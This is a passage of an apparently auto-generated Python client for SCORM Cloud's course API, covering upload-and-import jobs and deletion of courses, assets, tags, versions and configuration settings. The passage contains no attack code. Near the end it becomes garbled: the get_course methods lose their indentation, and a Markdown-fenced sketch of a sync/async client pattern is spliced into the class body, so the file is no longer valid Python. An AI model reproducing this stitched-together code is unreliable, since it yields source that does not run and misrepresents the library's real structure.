        :param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
        :param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
        :param str uploaded_content_type: The MIME type identifier for the content to be uploaded. This is required if uploading a media file (.pdf, .mp3, or .mp4).
        :param str content_metadata: Serialized 'mediaFileMetadata' schema.
        :param file file: The zip file of the course contents to import.
        :return: StringResultSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_upload_and_import_course_job_with_http_info(course_id, **kwargs)  # noqa: E501
        else:
            (data) = self.create_upload_and_import_course_job_with_http_info(course_id, **kwargs)  # noqa: E501
            return data

    def create_upload_and_import_course_job_with_http_info(self, course_id, **kwargs): # noqa: E501
        """Create a Course from an uploaded package # noqa: E501

        Creates a course from a package uploaded from your file system. The package will be sent as part of the request and will be stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_upload_and_import_course_job_with_http_info(course_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
        :param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists, a new version will be created. This has no effect if the course does not already exist.
        :param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
        :param str uploaded_content_type: The MIME type identifier for the content to be uploaded. This is required if uploading a media file (.pdf, .mp3, or .mp4).
        :param str content_metadata: Serialized 'mediaFileMetadata' schema.
        :param file file: The zip file of the course contents to import.
        :return: StringResultSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'may_create_new_version', 'postback_url', 'uploaded_content_type', 'content_metadata', 'file'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_upload_and_import_course_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `create_upload_and_import_course_job`") # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'course_id' in params:
            query_params.append(('courseId', params['course_id'])) # noqa: E501
        if 'may_create_new_version' in params:
            query_params.append(('mayCreateNewVersion', params['may_create_new_version'])) # noqa: E501
        if 'postback_url' in params:
            query_params.append(('postbackUrl', params['postback_url'])) # noqa: E501

        header_params = {}
        if 'uploaded_content_type' in params:
            header_params['uploadedContentType'] = params['uploaded_content_type'] # noqa: E501

        form_params = []
        local_var_files = {}
        if 'content_metadata' in params:
            form_params.append(('contentMetadata', params['content_metadata'])) # noqa: E501
        if 'file' in params:
            local_var_files['file'] = params['file'] # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['multipart/form-data']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/importJobs/upload', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='StringResultSchema', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course(self, course_id, **kwargs): # noqa: E501
        """Delete a Course # noqa: E501

        Deletes the specified course. >**Caution:** >When a course is deleted, so is everything connected to the course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course(course_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_with_http_info(course_id, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_with_http_info(course_id, **kwargs) # noqa: E501
            return data

    def delete_course_with_http_info(self, course_id, **kwargs): # noqa: E501
        """Delete a Course # noqa: E501

        Deletes the specified course. >**Caution:** >When a course is deleted, so is everything connected to the course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_with_http_info(course_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course_asset(self, course_id, relative_path, **kwargs): # noqa: E501
        """Delete an asset file from a Course # noqa: E501

        Deletes the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseAssetFile or UploadCourseAssetFile endpoints. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_asset(course_id, relative_path, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param str relative_path: Relative path of the asset within the course. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
            return data

    def delete_course_asset_with_http_info(self, course_id, relative_path, **kwargs): # noqa: E501
        """Delete an asset file from a Course # noqa: E501

        Deletes the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseAssetFile or UploadCourseAssetFile endpoints. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_asset_with_http_info(course_id, relative_path, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param str relative_path: Relative path of the asset within the course. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'relative_path'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course_asset" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course_asset`") # noqa: E501
        # verify the required parameter 'relative_path' is set
        if ('relative_path' not in params or
                params['relative_path'] is None):
            raise ValueError("Missing the required parameter `relative_path` when calling `delete_course_asset`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501

        query_params = []
        if 'relative_path' in params:
            query_params.append(('relativePath', params['relative_path'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/asset', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course_configuration_setting(self, course_id, setting_id, **kwargs): # noqa: E501
        """Delete a configuration setting explicitly set for a Course # noqa: E501

        Clears the specified setting from the course. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course level, it will continue to persist and will require deletion from the level at which it was set. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_configuration_setting(course_id, setting_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param str setting_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_configuration_setting_with_http_info(course_id, setting_id, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_configuration_setting_with_http_info(course_id, setting_id, **kwargs) # noqa: E501
            return data

    def delete_course_configuration_setting_with_http_info(self, course_id, setting_id, **kwargs): # noqa: E501
        """Delete a configuration setting explicitly set for a Course # noqa: E501

        Clears the specified setting from the course. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course level, it will continue to persist and will require deletion from the level at which it was set. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_configuration_setting_with_http_info(course_id, setting_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param str setting_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'setting_id'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course_configuration_setting" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course_configuration_setting`") # noqa: E501
        # verify the required parameter 'setting_id' is set
        if ('setting_id' not in params or
                params['setting_id'] is None):
            raise ValueError("Missing the required parameter `setting_id` when calling `delete_course_configuration_setting`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501
        if 'setting_id' in params:
            path_params['settingId'] = params['setting_id'] # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/configuration/{settingId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course_tags(self, course_id, tags, **kwargs): # noqa: E501
        """Delete tags from a Course # noqa: E501

        Deletes the specified tags from the course. Deleting tags that do not exist will still result in success. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_tags(course_id, tags, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param TagListSchema tags: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
            return data

    def delete_course_tags_with_http_info(self, course_id, tags, **kwargs): # noqa: E501
        """Delete tags from a Course # noqa: E501

        Deletes the specified tags from the course. Deleting tags that do not exist will still result in success. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_tags_with_http_info(course_id, tags, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param TagListSchema tags: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'tags'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course_tags" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course_tags`") # noqa: E501
        # verify the required parameter 'tags' is set
        if ('tags' not in params or
                params['tags'] is None):
            raise ValueError("Missing the required parameter `tags` when calling `delete_course_tags`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'tags' in params:
            body_params = params['tags']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/tags', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course_version(self, course_id, version_id, **kwargs): # noqa: E501
        """Delete a Course Version # noqa: E501

        Deletes the specified version of the course. If the last remaining version of the course is deleted, the course itself will be deleted and no longer accessible. >**Caution:** >When a course is deleted, so is everything connected to this course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_version(course_id, version_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_version_with_http_info(course_id, version_id, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_version_with_http_info(course_id, version_id, **kwargs) # noqa: E501
            return data

    def delete_course_version_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
        """Delete a Course Version # noqa: E501

        Deletes the specified version of the course. If the last remaining version of the course is deleted, the course itself will be deleted and no longer accessible. >**Caution:** >When a course is deleted, so is everything connected to this course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_version_with_http_info(course_id, version_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'version_id'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course_version" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course_version`") # noqa: E501
        # verify the required parameter 'version_id' is set
        if ('version_id' not in params or
                params['version_id'] is None):
            raise ValueError("Missing the required parameter `version_id` when calling `delete_course_version`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501
        if 'version_id' in params:
            path_params['versionId'] = params['version_id'] # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/versions/{versionId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course_version_asset(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
        """Delete an asset file from a Course Version # noqa: E501

        Deletes the asset file at the specified relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseVersionAssetFile or UploadCourseVersionAssetFile endpoints. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_version_asset(course_id, version_id, relative_path, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param str relative_path: Relative path of the asset within the course. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
            return data

    def delete_course_version_asset_with_http_info(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
        """Delete an asset file from a Course Version # noqa: E501

        Deletes the asset file at the specified relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseVersionAssetFile or UploadCourseVersionAssetFile endpoints. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_version_asset_with_http_info(course_id, version_id, relative_path, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param str relative_path: Relative path of the asset within the course. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'version_id', 'relative_path'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course_version_asset" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course_version_asset`") # noqa: E501
        # verify the required parameter 'version_id' is set
        if ('version_id' not in params or
                params['version_id'] is None):
            raise ValueError("Missing the required parameter `version_id` when calling `delete_course_version_asset`") # noqa: E501
        # verify the required parameter 'relative_path' is set
        if ('relative_path' not in params or
                params['relative_path'] is None):
            raise ValueError("Missing the required parameter `relative_path` when calling `delete_course_version_asset`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501
        if 'version_id' in params:
            path_params['versionId'] = params['version_id'] # noqa: E501

        query_params = []
        if 'relative_path' in params:
            query_params.append(('relativePath', params['relative_path'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/versions/{versionId}/asset', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_course_version_configuration_setting(self, course_id, version_id, setting_id, **kwargs): # noqa: E501
        """Delete a configuration setting explicitly set for a Course Version # noqa: E501

        Clears the specified setting from the course version. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course version level, it will continue to persist and will require deletion from the level at which it was set. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_version_configuration_setting(course_id, version_id, setting_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param str setting_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_course_version_configuration_setting_with_http_info(course_id, version_id, setting_id, **kwargs) # noqa: E501
        else:
            (data) = self.delete_course_version_configuration_setting_with_http_info(course_id, version_id, setting_id, **kwargs) # noqa: E501
            return data

    def delete_course_version_configuration_setting_with_http_info(self, course_id, version_id, setting_id, **kwargs): # noqa: E501
        """Delete a configuration setting explicitly set for a Course Version # noqa: E501

        Clears the specified setting from the course version. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course version level, it will continue to persist and will require deletion from the level at which it was set. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_course_version_configuration_setting_with_http_info(course_id, version_id, setting_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param str setting_id: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['course_id', 'version_id', 'setting_id'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_course_version_configuration_setting" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `delete_course_version_configuration_setting`") # noqa: E501
        # verify the required parameter 'version_id' is set
        if ('version_id' not in params or
                params['version_id'] is None):
            raise ValueError("Missing the required parameter `version_id` when calling `delete_course_version_configuration_setting`") # noqa: E501
        # verify the required parameter 'setting_id' is set
        if ('setting_id' not in params or
                params['setting_id'] is None):
            raise ValueError("Missing the required parameter `setting_id` when calling `delete_course_version_configuration_setting`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id'] # noqa: E501
        if 'version_id' in params:
            path_params['versionId'] = params['version_id'] # noqa: E501
        if 'setting_id' in params:
            path_params['settingId'] = params['setting_id'] # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/versions/{versionId}/configuration/{settingId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_course(self, course_id, **kwargs): # noqa: E501
"""Get detailed information about a Course # noqa: E501
Returns detailed information about the course. This includes title, update date, learning standard, and version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_with_http_info(course_id, **kwargs) # noqa: E501
return data
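    # The sync/async dispatch above is identical in every generated method: with
    # async_req=True the call returns a thread-like AsyncResult whose .get()
    # yields the data. A minimal self-contained sketch of that pattern (the
    # MiniClient class and its names are illustrative, not part of this module),
    # using multiprocessing.pool.ThreadPool much as the generated ApiClient does:

```python
from multiprocessing.pool import ThreadPool


class MiniClient:
    """Toy stand-in for the generated ApiClient's async_req handling."""

    def __init__(self):
        self.pool = ThreadPool(1)

    def call_api(self, course_id, async_req=False):
        if async_req:
            # Return an AsyncResult; the caller retrieves the value with .get()
            return self.pool.apply_async(self._fetch, (course_id,))
        return self._fetch(course_id)

    def _fetch(self, course_id):
        return {"id": course_id, "title": "Example Course"}


client = MiniClient()
sync_result = client.call_api("c1")             # returns the data directly
thread = client.call_api("c1", async_req=True)  # returns an AsyncResult
async_result = thread.get()                     # blocks until the call completes
```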
def get_course_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get detailed information about a Course # noqa: E501
Returns detailed information about the course. This includes title, update date, learning standard, and version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'include_registration_count', 'include_course_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course" % key
)
params[key] = val
del params['kwargs']
